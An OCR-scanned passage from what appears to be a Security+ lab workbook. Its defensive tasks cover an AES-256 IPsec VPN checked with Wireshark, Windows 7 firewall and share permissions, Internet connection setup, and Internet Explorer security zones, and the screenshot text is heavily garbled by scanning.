K establish secured connections.

IPsec exemplions

Exempting ICMP from all IPsec requirements can simplify
B troubleshooting of network connectivity issues.

Exempt ICMP from IPsec: Mo [default) b

ok | [ Cancel ][ foph

3. In the Data Protection section, select Advanced, and then click the Customize button.
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Customize IPsec Setti I ]

IPsec will use these settings to establish secured connections when
there are active connection security ules.

‘when pou use the default, settings that have been specified at a highes
precedence Group Policy object will be used.

Key exchange [Main Mode)
@ Defaul [recommendsd]

) Advanced Customize.
Data pratection (Quick Mode)
() Defaul [recommended)
@ Advanced

Authentication Methed
@ Defaurt

() Computer and User (Lusing Kerberos V5)

() Computer [using Kerberos V5]

() User [using Kerberos V)

() Computer certificate fiom this certification suthority:

I ” Browse...
[] Accept oniy health cenficates
) Advanced [ Customize... |

Leain more sbout IPsec seltings
What are ! I val

4. Enable the check box Require Encryption For All Connection Security Rules That Use

These Settings.

CETITTEEET . M S|

Data protection settings are used by connection secunity nules to protect netwark traffic.

Require enciyption for all connection security rules that use these settings.

[ ata integriby [Drata integrity and encryption

Pratect data from modification on the netwark with these Pratect data from modification and preserve confidentiality on

intedrity algorithmz. Thaose higher in the list are tried Ffirst, the network, with these intearity and encryption algorithms.
Those higher in the list are tried first.

D ata integrity algorithms: D ata integrity and encryption algorithms:

Pratocol Integrity ey Litetime [minutes/KB] Protocol Integrity Encryption ke Litetime [mir..
ESF SHAT E0/100.000 ESF SHAT AES128 60/100.000
AH SHAT E0/100.000 ESF SHAT 3DES 60/100.000

Add | ‘ Edit | ‘ Remowe Add ] | Edit. | | Remove |

Learn more about intedrity and encryption
“wihat are the default values?
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In the Data Integrity And Encryption pane, click the Add button.

In the Integrity And Encryption Algorithms window, select the following settings:
= Protocol: ESP (Recommended)

= Encryption Algorithm: AES-256

= Integrity Algorithm: SHA1 (Default)

Also set the Key Regeneration settings to 15 (minutes) and 25,000 (KB, which is 25 MB).

(=]

Integrity and Encryption Algorithms.

Protocol

@ ESP [recommended)
ESP protocol provides privacy and integrity for the packet payload. ESP is compatible with Network Address
Translation (NAT).

() ESP and AH
Adding the AH protocol provides additional integrity for the IP header. This option is not compatible with NAT.

Enciyption algorithm Integrity algorithm

@ AES-256 @ SHA1 [default)
Strongest security, highest resources usage. Considesed stronger than MDS, uses slightly
Compatible only with Windows Vista and later MOIE IESOLICES.
:y:::gz ) MD5 [not recommended)

© G This algorithm is provided for backward
Stronger than AES-128, medium resource usage. compatibility only.

Compatible only with Yindows Vista and later
systems.

() AES-128 [default)
Faster and stionger than DES. Compatible only Key lifetime (in minutes): 153

with Windows Vista and later systems. s
Key lifetime (in KB} 25,0004

Key regeneration

) 3DES
Higher resource usage than DES.

) DES (not recommended)

This algorithm is provided for backward
compatibility only.

Leam more about data encryption settings

These settings represent a high level of security. The performance of the
TE computers using these settings will degrade, based on the amount of
information flowing through this IPSec VPN.

7. Click OK.

8. Remove the AES-128 and 3DES VPN configurations, leaving only the new IPSec VPN
configuration.
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ooy =

[rata protection settings are used by connection secuiity rules to protect network traffic.

Require enciyption for all connection security rules that use these settings.

D ata integrity [1ata integrity and encryption

Pratect data from modification on the netwark with these Pratect data from modification and preserve confidentiality on
intearity algorithms. Those higher in the list are tried first the network with these integrity and encryption algorithms:
Those higher in the list are tried first

D ata integrity algarithns: Data integrity and encryption algorithms:

Protocal  Integrity ey Lifetime [minutes/KB] Protocal  Integrity Encryption  Key Lifetime [min

ESP SHAT 607100000 ESP SHAT AES5-256 15/25.000
AH SHAT 607100000

(][>

pdd.. ][ Edt. ][ FRemove add.. | [ Edt. ][ Remove |

Learn more about intearity shd encruption
What are the default values?

Click OK three times to implement the new IPSec VPN standard.

. Repeat this same process (“Configuring the IPSec VPN steps 1 through 13, and

“Configuring the IPSec VPN to Use AES-256,” steps 1 through 9) on the destination

computer, only reversing the Endpoint IP addresses. All other settings must remain
the same.

idating the IPSec Encryption for Data in Transit

On the source computer, connect to the shared folder on the destination computer
by clicking Start » Run and typing \\<IP Address of the Destination Computer>\AA.
Then click OK. (In this case, the command is \\192.168.222.150\AA).

You may be prompted for the credentials of an authenticated user on the
TE destination computer to establish the connection.

Launch the Wireshark Network Analyzer. Arrange items on your desktop so that you
can see the Wireshark Network Analyzer, the new file VPN_Test. txt that was used
earlier, and the AA folder on the destination computer.

In the Wireshark Network Analyzer application window, select Capture > Interfaces
from the menu.

Adjacent to the interface that provides the connection to the destination computer,
click the Start button to begin the capture. In this case, it is the interface with the IP
address 192.168.222.20.
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5. Dragand drop the VPN_Test. txt file into the AA folder that is shared on the
destination computer. You will need to confirm the overwrite of the original.

6. In the Wireshark Network Analyzer application window, select Capture » Stop from
the menu.

7. In the Wireshark Network Analyzer application window, review the captured frames.
This time, what you see between source and destination computers is only the ESP
(Encapsulated Security Payload) protocol, the encrypted IPSec packet protocol. You do
not see the SMB2 protocol between the source and destination computers. Further, as
you interrogate each frame, you cannot identify the ASCII data contained within the
file that was copied from source to destination because it is encrypted with AES-256.

TETEE W, S

Eile Edit Wiew Go Capture Analyze Statistics Help
e DEXZ2E ArsrT2I(EE QQafl @@ %%
Filter: | ~ Expression.. Clear Spply
Mo. . Time Source Destination Protocol  Info =
1 0.000000 Dell_hc:da:7h Broadcast ARP who has 192.168.222.2007 Tell 182
2 0.307040 Dell_hc:da:7h Broadcast ARP who has 192.168.222.2007 Tell 182
EEIN Dell_hc:4a:7h Broadcast ARP who has 192.168.222.2007 Tell 182
4 3.711067 192.168.222.20 192.168.222. ESP ESP (SPI=0x5383ceed)
5 3.712046 102.168.222.150 102,168,222, ESP ESP (SPI=0x01be5857)
6 3.,712671 192.1638 192,168,222, ESP ESP (SPI=0x5383cesd)
7 3.713467 192, 1%2.168.222. (SPI=0x01be3957)
8 3 052 02, ] 2 152,168, 222 15 X 3383 4 ]
G 3.715250 1%2.168.222.150 192.168.222.20 (SPI=0x01he3557)
AT PEEEAT AN 1 ET I3 N0 AN TET I 1 EA FEmT A B3 ST e
< T | 3

@ Frame 8 (310 bytes on wire, 310 hytes captured)

[ Ethernet II, Src: guantaco_48:82:cd (00:1e:68:458:82:cd), Dst: vmware_0e:b2:29 (00:0C:29:0e:bh2:28)
@ Internet Protocol, Src: 182.168.222.20 (192.168.222.20), Dst: 192.168.222.150 (192.168.222.150)
® Encapsulating security Payload

0000 00 O0cC 25 0e b2 25 00 le 68 48 82 od 08 00 45 00
0010 01 28 1f 41 40 00 80 32 5c 66 <0 aB de 14 <0 a8
0020 de 96 53 83 ce 24 00 00 00 3f 5c 1d 35 5a 2e 31
0030 h2 e0 dB 9 54 dc 62 04 5d a3 aa <9 3d 72 4¢ 12
0040 98 9 ad 92 1le la 13 1le 73 21 S5e 27 b7 b5 45 &7
0050 << 22 2e 63 50 07 a9 df <4 d3 17 75 a4 Fe B85 87
0060 23 bo fb eo 8F f§ 5F 15 42 <2 0c 6 24 d3 el &7
0070 df of ae bd 54 e7 24 97 88 bl 48 53 <b &3 37 b3
0080 ed 46 88 b3 30 3¢ 6c 13 3f 45 ae 3 49 98 5e bf
0050 8a 17 ¢3 4a hc 72 61 8F 9a 76 ef e8 1le 80 ec 78
00a0 de 4c 77 7f 67 48 67 b8 52 ad 25 5Se 4d a0 50 <4
00b0 bbb 0c 21 52 56 3¢ ae bd 57 45 26 B2 <1 27 59 4d
00cO 90 bl Sb 25 8F b0 2 44 10 a3 56 of 84 aD od 4a
00d0 df bl 97 <d a4 cd 9b d7 08 85 19 ba 2a 22 1 ce
0020 S5c 19 1e 48 6a ae 72 46 24 d0 ca 71 1c 88 03 a9
00f0 de ch 96 <4 3b 24 5d 94 22 19 <0 17 81 dc dd 3f

File: "Ci\Users\TopDog\AppDatatLacalTem. . | Packets: 217 Displayed: 217 Marked: 0 Dropped: 0 Profile: Default

You might be able to make an educated guess about which frames carried

TE the content of the file being copied, based on the number of bytes in the
frame. However, the data remains completely unreadable in the sniffer
trace (capture).

8. On the destination computer, open the newly copied file. Notice that it is not encrypted
and is fully readable. IPSec VPNs encrypt content only while in transit, not while at rest.



352 Phase 6 = Network Security

B ¥vrN_Test.txt - Notepad =] B3]

File Edit Format Yiew Help

pavid R, miller

SME, MCT, MCITPro, MCSE: Security, CISSP,

CwhA, CCMA, CME, LPT, ECSA, CEH, Security+, etc.
www, MIcroLinkCorp, com

lauthor: MCITPro 70-647: windows Server 2008 Enterprise administration
MSPress ISBN-10: 0735625093 ISBN-13: 780735625099

lauthor: MCITPro 70-237: Designing Messaging Solutions with microsoft® Exchange Server 2007
MSPress ISEN-10: 0735624097 ISEN-13: 9780735624092

lauthor: MCITPro 70-622: supporting applications on a windows vista Client for Enterprise sup
Exam Cram ISBN-10: 0789737161 ISBN-13: G7B07BO737199

lauthor: MCITPro 70-623: sSupporting applications on a windows vista Client for Consumer Suppo
Exam Cram ISBN-10: (789737205 ISBN-13: 9780780737205

lauthor: Security+: Security Administrator Street Smarts
Syhex ISBN-10: Q470102586 ISBN-13: S78-0470102580

Technical Editor: MCTS 70-620: windows vista Client cConfiguration study cuide
oshorne ISBN-10: Q071489501 ISBN-13: 780071450007

Mote: The dnformation contained in this message may be privileged and confidential and prote

-

] ol 4

9. To ensure continued network functionality, remove the new connection security rules in
Windows Firewall With Advanced Security on the source and destination computers.

Criteria for Completion

You have completed this task when you have successfully constructed an IPSec VPN using
AES-256 and then verified the encryption by capturing a file transfer with a network analyzer.

Task 6.9: Implementing
a Personal Firewall

Earlier in this chapter you implemented a packet filter on a Windows Server 2003 server to
block undesirable traffic inbound to the server. A packet filter is a first-generation firewall.
You’ll probably recall that most contemporary firewalls combine the packet filter (called

a generation 1 firewall) with a proxy service (called a generation 2 firewall) and a stateful
inspection engine (called a generation 3 firewall). These are the types of firewalls you

find at the edges of a corporate network, where the corporate LAN meets the Internet, to
protect the LAN from unwanted activity.

As the risk of attack has increased over the years, the use of a firewall on each network
node, like on each workstation, has grown popular. These are called personal firewalls.
Most personal firewalls include the generation 1 packet filter firewall and the generation 3
stateful inspection engine. The generation 2 proxy server firewall usually is too heavy a
load on most workstations, decreasing network performance to unacceptable levels.

In a corporate environment, the personal firewalls on workstations are typically controlled
en masse by the network administrators through Group Policies and users cannot make
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adjustments to the firewalls. On your home computers and personal laptop computers, you
may need to make these adjustments yourself.

Scenario

You will be collecting music files on your personal computer at home. You want to be able
to copy these files to your laptop computer using your home network. To do so, you must
create the folder share and be sure the personal firewall will allow the connection from
your laptop.

Scope of Task

Duration
This task should take 20 minutes.

Setup

Your home computer has a fresh installation of Windows 7 and is configured with only the
default settings.

Caveat

Allowing a program through the firewall usually requires that you open a port on the
firewall that is associated with the application or service. Opening ports on the firewall
may allow malicious traffic into the system. Because malware will often try to open
backdoors into your system, only open the firewall for applications you know you want,
and make sure you trust the source of the application. In this case, the source of the
application, the Microsoft File And Printer Sharing service, is trusted, but the service
listens for inbound traffic. This opens this legitimate, trusted, and desirable service to
attack from remote systems.

Procedure

You will first review the default settings and configuration options for the Windows 7
personal firewall. Next you will create a shared folder, which will initiate changes to

the personal firewall to allow this new network function to operate properly. Finally, you
will observe the changes to the personal firewall configuration.

Equipment Used

For this task, you must have:

= Windows 7 system with default settings
s Network connectivity

s Administrator access
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Details

Reviewing the Personal Firewall

1. Log on to the Windows 7 system as the Administrator.

2. Click Start » Control Panel.

3. In the Control Panel, select System And Security » Windows Firewall.

&
&

&
]

r = | B [ |
@Ovlﬂ » Control Panel » System and Security » Windows Firewall - “,‘ ‘ Search Con.. P |
@

Centrol Panel Home

Allow a program or feature
through Windows Firewall
Change notification settings

Turn Windows Firewall on or
off

Restore defaults
Advanced settings
Troubleshoat my netwark

See also
Action Center
Network and Sharing Center

Help protect your computer with Windows Firewall

Windows Firewall can help prevent hackers or malicious software from gaining access to
your computer through the Internet or a network.

How does a firewall help pratect my computer?

What are network locations?

. '-@ Home or work (private) networks Not Connected ()

. '-@ Public networks Connected (&)

Networks in public places such as airports or coffee shaps

‘Windows Firewall state: On

Incoming connections: Block all cennections to programs that are
not on the list of allowed programs

Active public networks: = Network

Notification state: Notify me when Windows Firewall blocks a
new program

TE

Your computer (for instance, a laptop computer) may periodically be attached to a
less trusted network, such as at a hotel, a coffee shop, or a meeting center (public
networks). This Public profile has fewer firewall openings than the Private profile.

You select a profile for each network to which you connect your computer at the time
of the first connection. In essence, you are configuring the personal firewall for that

Because your computer may be connected to your home network or used
on a company-managed network, the personal firewall has more relaxed
settings for these more trusted environments (home or work [private]
networks). This Private profile opens just a few ports in the firewall that are

commonly needed at home or at work.

network when you choose a Public or Private profile.

Notice that you can perform the following configuration adjustments from this dialog box:

s Allow A Program Or Feature Through The Windows Firewall (used to open or

close ports in the firewall)
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= Change Notification Settings (used to increase or decrease warnings when the
firewall takes action)

s Turn Windows Firewall On Or Off
= Restore Defaults (used when you want to purge your customizations)
= Advanced settings (for the savvy user)

In the left pane, click the Allow A Program Or Feature Through The Windows
Firewall link.

Notice the settings are grayed out, disallowing any changes.

Click the Change Settings button. If you are prompted for confirmation by User
Account Control, click Yes to confirm your desire to proceed.

Scroll down and observe the Allowed Programs And Features list. Notice the two
different settings for the Private and Public profiles. Also notice that the Public profile
is more restricted, because it is more risky.

r ==
@Qqﬂ <« System and Security » Windaws Firewall » Allowed Programs [ 43 ]|[ Search Con.. P |
Allow programs to communicate through Windows Firewall b
To add, change, or remove allowed programs and ports, click Change settings. B
What are the risks of allowing a program to communicate? Change settings
Allowed programs and features:
Name Home/Work (Private)  Public  *
[ Connect to a Metwork Projector m} o
[ Core Metworking
O Distributed Transaction Coordinator ] o =
[IFile and Printer Sharing m} O
O HomeGroup O O L
[TiSCSI Service m} m}
[ Key Management Service m] m]
[0 Media Center Extenders m} O
[0 Netlogon Service m} O
[4 Network Discovery O
[ Performance Logs and Alerts O O
[l Remote Assistance [
Allow another program... o

Notice the following default settings:
Core Networking

= Enabled for Private and Public
File And Printer Sharing

= Disabled for Private and Public
Network Discovery

s Enabled for Private

= Disabled for Public
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A enabling the stateful inspection firewall.

)r Core networking allows for basic IP network connectivity, primarily
TE

File And Printer Sharing is the server service on a system and allows you
to share folders and printers.

Network Discovery allows you to identify (find or see) other systems on
the network and be identified (be found or be seen) on the network.

8. Observe that you can enable (allow) a service or application in this list on none, one,
or both profiles by checking or clearing the check boxes. Each checked box represents a
network path, an opening into your computer, for good use or for malicious attack.

% Do not add any new programs to the firewall list in the next step.
A TE

9. Click the Allow Another Program button.

This is how you would add a new program to the list to enable it to pass traffic through the
firewall. You can select the applications from the list provided, or browse to the executable,
and then you would click Add. Also notice that you can preconfigure which profile the new
program is enabled for, once added, by clicking the Network Location Types button.

# n
Add a Program @

Select the program you want to add, or dick Browse to find one that is not
listed, and then click CK.

Programs:

@Intemet Explorer
@Internet Explorer (&4-bit)
‘ Microsoft Security Essentials
w Microsoft Sikverlight
= 1 Windows DVD Maker

= Windows Fax and Scan

[ windaws Live Ml

2 Windaws Live Mesh

f‘_?g wWindaws Live Messenger
Windows Live Movie Maker >

Fath: Criwindowstsystem32\recdisc. exe

What are the risks of unblocking a program?

mn

¥ou can choose which network location types to add this program to.

Metwork location bypes. .. [ Add J [ Cancel

10. Click the Cancel button without adding any programs.
11. Click the Cancel button to close the Allowed Programs dialog box.

12. Click the red X in the upper-right corner of the Windows Firewall dialog box to close
the Control Panel.
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Right-click the Start button and select Open Windows Explorer.

In the left pane, click Computer » Local Disk (C:).

EET=)
@Qvl‘e_’ » Computer » Local Disk(C} » - |$y| ‘ Search Loc. }J|
Organize + Share with » Burn New folder =~ 0 @
=
B Desltap * Mame Date madified Type
& Downloads E
%= p oI . Perflogs 7/713/2009 1L20 PRI File foleer
=, Recent Places
- . Pragram Files 1718/2011 7:02 PM File falder
L . Pragram Files (x86) 1/20/2011 4:12 PM File falder
4 Libraries
@ b 2 . Users L/18/2011 12203 PRI File folder
> acuments
J’ M : Windows 1718/2011 7:06 PM File falder
> Music E
» =] Pictures
> E Videos
a4 8 Computer
© &, Local Disk (€) | —
> € Netwark LK ] v

5 items

&

357

In the right pane, right-click in the white space and select New » Folder. Rename the

folder AA.

Double-click the AA folder.

In the right pane, right-click in the white space and select New » Text Document.

Accept the default name for the text document by pressing the Enter key.

In the left pane, expand Local Disk (C:). Right-click the AA folder and hover your

mouse over the Share With option.

[E=SRIER =)
@\‘J'l . v Computer » Local Disk {C:) » AA ""?ll Search AA p\
Organize + j Open Print Burn New folder = - 0 @
=
» (&5 Pictures * Mame Date modified Type
> B Videos

| New Text Document

4 M Computer
4 £, Local Disk (C
. AA
. Perflogs
> Ly Program Fil
> Ly Program Fil
> JU Users

> 1 Windaws
> €8 Netwark

= NewTe
Text Do

—

Expand

Open in new window

Scan with Microsoft Security Essentials...

Share with
Restore previous versions

Include in library
Send to
PGP Desktop

Cut
Capy

Delete

L/28/201L L39PM  Text Document

g Mabady
Homegraup {Read)
Homegraup {Read/Write)

Specific peaple...

ate created: 1/28/2011 1:39 PM

] 3
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Notice that you can quickly share a folder in several preconfigured manners by using

these menu options. In this exercise, you will use a different, more customizable
procedure to create the folder share and initialize the File And Printer Sharing service.

In the right pane, right-click in the white space to clear the menu from the display.

In the left pane, right-click the AA folder and select Properties from the menu. Select

the Sharing tab.

L J=[ L » Camputer » Lacal
@\/ !

Qrganize « Include in library =
[E=] Pictures o Mame
H Videas

Mes

1% Computer
£, Lacal Disk (C3)
. AA —
| Perflogs
. Program Files

. Program Files | _

. Users
. Windows
ﬁi Metwark R
v 4 [
l 1 item

| AA Properties =

| General| Sharing | Secuiity | Previous Yersians | Customize|

Metwark File and Folder Sharing

I
0 NotShasd

Metwork Path:
Not Shared

Advanced Sharing

Set custom permissions. create multipls shares, and sat other
advanced sharing options.

@Advanced Sharing...

Pasgword Protection

Peaple must have a user sccount and passward for this
computer to access shared folders

Ta change this setting, use the MNetworl and Sharing Center.

Apply

E‘

hd

ument

10. Click the Advanced Sharing button.

11. Check the Share This Folder check box. Change the Limit The Number Of
Simultaneous Users To value to 1. This will now reject the number of inbound
connections to this share, reducing the load on the system and limiting the
vulnerability to this particular type of denial-of-service (DoS) attack.

- J®| b » Computer » Local
@\J !

Organize »

Include in library +

(] Pictures o

H videas

Mame

e

=

78 Computer
&, Lacal Disk {C))
| AA —
| Perflags
| Pragram Files
| Pragram Files (| _
| Users 1

J Windows

€ etwark =
-

] Litem

| AA Properties ' 8,. P
| General| Shating | Secuiity | Previous Versions | Customizs| J E ol
]
-
Netwold Adyanced Sharing
l ) [] Share this folder
Netwarl Sattings
Nat 3§ Share name:
Shat AR
tdvancd | Add Remove
St cust]| Limit the number of simultaneous users to: 1 =
advancy |
Comments:
4|
Passwor |
|
To chary|
[ ok ] [ Cancel ] [ Apply ]
\

|

,:‘I
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12. To adjust the permissions accordingly, click the Permissions button. By default, new
folder shares are configured with the Allow Read permission for Everyone. In this case,
you will be the only one accessing this share, and on occasion you might need to copy
content from the laptop to this computer.

r . B
| . Permissions for A4 g
Share Pemissions

Group or uger names:

Permisgions for Everyone Allow Dery
Full Contral |} |}
Change ] I
Read B

Learn about secess control and permissions

13. Click the Add button to add your user account to the Group Or User Names list. Type
your username into the Enter The Object Names To Select field.

- B
Select UsersorGroups % m
Select this object type:
Users, Groups, or Built-in security principals Object Types
Frarn this location:
WINZENTES Locations...
Enter the object names to select [examples):
Bul Check Names

1! — =

14. Click the Check Names button. The system should respond by adding the object
COMPUTERNAME\USERNAME in the list.

15. Click OK to return to the Permissions dialog box, where you should see your username
on the Group Or User Names list.
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16. Be sure your username is selected and then grant your user the Allow Change
permission. This gives the user the ability to read, copy files and folders from this
folder, copy or create new files and folders into this folder, and delete files and folders
from this folder.

r B
1. Permissions for AA ﬂ
Share Pemizsions
Group or user names:
el (/INFEN T B4Rl
3;3‘. Everyone
Permissions for Bull Allow Deny
Full Control = ]
Change a
Read a

Learn shout access control and permissions

[ QK ][ Cancel H Apply

17. Select the Everyone group from the list. Click the Remove button to disallow anyone but
you access to this folder share. Click OK to return to the Advanced Sharing dialog box.

18. Click OK to return to the Sharing tab on the AA folder Properties dialog box. Click
the Close button.

Verifying Settings on the Personal Firewall
1. Select Start » Control Panel.
2. In the Control Panel, select System And Security » Windows Firewall.

3. In the left pane, click the Allow A Program Or Feature Through The Windows
Firewall link.

4. Scroll down and observe the Allowed Programs And Features list. Notice the following
settings:

Core Networking

= Enabled for Private and Public
File And Printer Sharing

s Disabled for Private

= Enabled for Public



Task 6.9: Implementing a Personal Firewall 361

Network Discovery

= Enabled for Private

= Disabled for Public

Since you will only need to copy files over your home network, on the newly enabled

File And Printer Sharing program, you want private networks enabled and public
networks disabled.

5. Click the Change Settings button. Check the box for File And Printer Sharing under
Home/Work (Private), and clear the check box under Public.

r :@ng

@U'|ﬂ e« System and Security » Windows Firewall » Allowed Programs - | &-,| ‘ Search Con... 2 |

Allow programs to communicate through Windows Firewall F

To add, change, or remove allowed programs and ports, click Change settings.

What are the risks of allowing a pregram to communicate? Change settings

Allowed programs and features:

Mame Home/Work (Private]  Public =
[ BranchCache - Hosted Cache Server (Uses HTTPS)
[BranchCache - Peer Discovery (Uses WSD)

O Connect to a Network Projector

Core Networking

[ Distributed Transaction Coordinator

File and Printer Sharing

OHemeGroup

[JiSCSI Service

[ Key Management Service

[ Media Center Extenders

O Metlogon Service

Network Discovery

m

ogonog

®
oooooOoEoROonond

gOoooog

Allow another program... =

6. Click OK.

7. Click the red X button in the upper-right corner of the Windows Firewall dialog box to
close the Control Panel.

Criteria for Completion

You have completed this task when you have reviewed the default Windows 7 personal
firewall configuration, created a secured shared folder for your personal use, and then
tuned the personal firewall to allow inbound connections to that share only on trusted
(private) networks.






Securing Internet
Activity




The Internet is truly a great thing. It makes a huge amount of
information instantly available. It also provides connectivity to
near and distant sites and facilitates tasks like web browsing,
email, and instant messaging. However, it is not without its dangers. It’s the source of most
viruses and worms that organizations are faced with. Melissa, Code Red, Nimda, I Love
You, and SQL Slammer are examples of viruses that were spread via the Internet. Internet
users are also faced with all types of scams, phishing schemes, and malware that seek to
lure them in or infect their computer.

For the security professional, this means configuring Internet access, securing email,
and verifying the authenticity of the people we deal with through the Internet. This
is accomplished by means of certificates. These are all important parts of the security
professional’s daily duties.

The tasks in this phase map to Domains 1, 2, and 6 in the objectives in the
TE CompTIA Security+ exam (www.comptia.org/certifications/listed/

security.aspx).

Task 7.1: Configuring Internet Access

Internet access is an integral part of business and the workplace. While configuring a client
for Internet access may not be the most exciting part of the day, it is a common task of the
IT professional.

The Internet can be accessed through several methods:

Modem This connection method allows you to connect a single computer to the Internet.
LAN This connection method allows you to connect multiple computers to the Internet.

Internet Connection Sharing (ICS) This connection allows all the computers in the
network to share the Internet connection of one computer.

g ICS will be discussed in Task 7.4.
TE
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The most common way to establish a connection by modem or LAN is by using the New
Connection Wizard.

Scenario

You have been asked to configure Internet access on a number of LAN-based computers.

Scope of Task

Duration
This task should take about 10 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

While almost every employee would love to have Internet access, remember the principle of
least privilege. Employees should only have the access and privilege they need to perform
their duties. This technique builds greater security as it limits users’ access and rights in the
network.

Procedure

In this task, you will configure basic Internet access.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, or Windows 7 computer
= Administrator access

s An Internet connection

Details

This task will walk you through the steps required to configure basic Internet access
through a LAN connection.
To configure Internet access with the New Connection Wizard, follow these steps:

1. From the Windows desktop, right-click on the Internet Explorer icon and choose
Properties.
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Internet"Options E E

General |Securlty H Privacy H Cantent H Connections || Programs H Advanced|

Home page
[’? To creste home page tabs, type each address on its own line.
ot |

[ Use current ][ Use defaul: ][ Use blank

Browsing history

1| Delete temporary files, histary, cookies, saved passwords,
¥ and web Form information,

[[]Delete browsing histary on exit

Delete. .. ] I Settings ]
Search
p Change search defFaults, Settings
Tabs
Change how webpages are displayed in Settings
[ ‘tabs
Appearance
[ Colors ] I Languages l [ Fonts l [ Accessibility ]

2. Select the Connections tab, and click the Setup button. This launches the New
Connection Wizard.

New Connection Wizard
Getting Ready
The wizard is preparing to get up your Intermet connection.

How do wou want ta connect to the Internet?
() Choose from a list of Intemnet service providers [I5Ps)

(5) Set up my connection manually

Far a dial-up connection, you will heed your account name, password, and a
phone number for your ISP, For a broadband account, pou won't need a phone
riumber,

() Use the CD | got from an ISP

[ + Back “ Hext > I[ Cancel I

3. Here, you can choose to set up the Internet connectivity via a list of ISPs manually or
from a CD. Choose the option to configure manually via LAN. Click Next.

4. On the next screen, choose the option Connect Using A Broadband Connection That Is
Always On.



Task 7.2: Using Internet Explorer Security Zones 367

Internet Connection
How do you want to connect to the Intemet?
() Connect using a dial-up modem
This twpe of connection uses a modem and a regular ar 5D phone line.
() Connect using a broadband connection that requires a user name and
password

This i a high-speed connection using either a DSL or cable modem. vour ISP may
refer ta this tupe of connection as PPPoE.

(5) Connect using a broadband connection that is always on

This is & high-speed connection using either a cable modem, DSL or LAN
connection |t s always active, and dossn't require you to sign in.

[ ¢Back J[_Mew> ] [ Concel

5. Click Finish to complete the wizard.

Completing the New
Connection Wizard

To close this wizard, click Finish.

¢ Back ” Finish ]l Cancel

Criteria for Completion

You have completed this task when you have configured a networked computer for Internet
access using the New Connection Wizard.

Task 7.2: Using Internet Explorer
Security Zones

Internet Explorer uses a simple concept to provide you with security when surfing the Internet:
security zones. Security zones allow users to set levels of security based on the trust level of the
site. With a fully trusted site, you will probably want to let all types of web content execute.
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With untrusted sites, you may want to block active content or prompt the user before the
content is allowed to execute.

Scenario

Your manager has been reading up on the various ways that computers can become infected
with malicious code. His main concern is the web access that most of the company’s end
users have. He has asked you to come up with a simple way to control active web content
and block this activity to all but a few trusted sites.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you need a Windows computer, access to the Administrator account, and an
Internet connection.

Caveat

While increasing security can better secure a computer, it also can reduce usability and add
a layer of complexity for users attempting to view active web content.

Procedure

In this task, you will learn to configure Internet Explorer security zones.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, or Windows 7 computer
= Access to the Administrator account

= An Internet connection

Details

This task will show you how to configure Internet Explorer security zones to reduce the threat
of Internet-based malicious code. Zones have flexibility in allowing various levels of security.
To configure Internet Explorer security zones, follow these steps:

1. Open Internet Explorer. Then choose Tools » Internet Options.
2. Click the Security tab. You will notice four icons at the top of the page:
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Internet This includes all websites that are not contained in any of the following
categories.

Local Intranet These are websites that your organization manages and are internal.
Trusted Sites These are trusted websites that must be specified by address.

Restricted Sites These are untrusted sites that have strict security settings applied.

These categories allow websites to be segregated. As an example, websites located
within your company would be given a higher level of trust than those outside
the organization.

On the Security tab, select the Internet globe icon. This will allow you to configure the
settings for this category of websites. The following settings are available:
High This is the highest setting. Many websites will not display content at this setting.

Medium-High Notice that this is the default setting as Microsoft feels that it offers a
good balance between usability and security. This setting offers some security, as most
content will run only after prompting.

Medium This setting offers little security, as most content will run without prompting.
However, it does block unsigned ActiveX controls from being downloaded.

Low There is no real protection at this level and it should be used only for sites you
fully trust.

Internet"Options Z E

GenerallSEEUfitY ‘Prlvacy Content | Connections | Programs | Advanced

Select a zone ko view or change security settings,

Inkernet Local intranet  Trusted sites  Restricked
sites
Internet
0 This zone is for Internet websites,
except those listed in trusted and

restricted zones.

Security level For this zone
Allowed levels For this zone: Medium to High
Medium-high
- Appropriate For most websites
- Prompts before downloading potentially unsafe
content
- Unsigned ActiveX controls will not be downloaded

Custom level...

[ Reset all zones ko default level ]
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2 Even on a High security setting, it may still be possible for a user to
ING download content from a site and run it locally. Doing so would bypass
security controls and allow the malware to execute.

4. Click the Custom Level button at the bottom of the page. This will allow you to make

specific changes to the profile.

5. In the Security Settings dialog box, change Run Components Not Signed With
Authenticode to Disable. Next, change Run Components Signed With Authenticode
to Prompt. Click OK to save these changes and complete the changes needed for the

Internet zone.

Choose the Local Intranet icon at the top of the page, then click the Sites button.
Verify that the Local Intranet settings are checked for the following:
= Include All Local (Intranet) Sites Not Listed In Other Zones

Internet Options !E

General | Security | Privacy | Content | Connections | Frograms | Advanced

Select a zone to view or change security settings.

@ €@ v 0O

Internet Localintranat  Trusted sites  Restricted
sites

Internet
This zone is For Inkernet websites,
except those listed in trusted and

restricted zones.

Security level For this zane
Allowed levels For this zone: Medium to High
[ Medumhigh
- Appropriats For most websites
‘-,—' Prompts before downloading patertialy unsafe
cankent
“linsigned Activex controls wil nat be dowrloaded

Custarn level...
Reset all zones to default level

s Include All Sites That Bypass The Proxy Server
= Include All Network Paths (UNCs)

After verifying these options are checked, close the Local Intranet window.

oCca 1 ane

(g Use the settings below to define which websites are included in
%, the local intranet zone,
(] automatically detect intranet netwaork
Include all local {intranet) sites not listed in other zones
Include all sites that bypass the proxy server
Include all network paths {UNCs)

what are intranet settings? | Advanced ][ OK. ” Cancel
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Network paths, or Universal Naming Convention (UNC) paths, are treated
TE as local sites. These usually take the form of \\company_server\share\

10.

11.

12.

schedule.htm and are used for network files that are included in the Local
Intranet zone.

Click the Trusted Sites icon and click the Sites button. The Trusted Sites window is
where you can add or remove websites that you trust and that have a low level of
security applied.

Add www. thesolutionfirm.com to the list of trusted sites and then close the Trusted Sites
window.

f You can add and remove websites fram this zone. All websites in
L 4 this zane will use the zone's security settings.

Add this website to the zone:
e, thesalutionfierm.com

Websites:
htkpe f v, knowthetrade, com

[ Require server verification thttps:) For all sikes in this zone

Close

Click the Restricted Sites icon and click the Sites button. This will allow you to add
sites that could potentially damage or harm the computer.

With the Restricted Sites window open, add www. thewhitehouse.com to the list of
restricted sites.

Once this site has been added to the Restricted Sites window, you can click OK and
then close the Internet Options dialog box.

Criteria for Completion

You have completed this task when you have used Internet Explorer security zones to add a
site to the trusted list and blocked access to a restricted site.

Task 7.3: Configuring IE for Secure
Use of Cookies

Cookies have a legitimate purpose. They help maintain state in the stateless world of
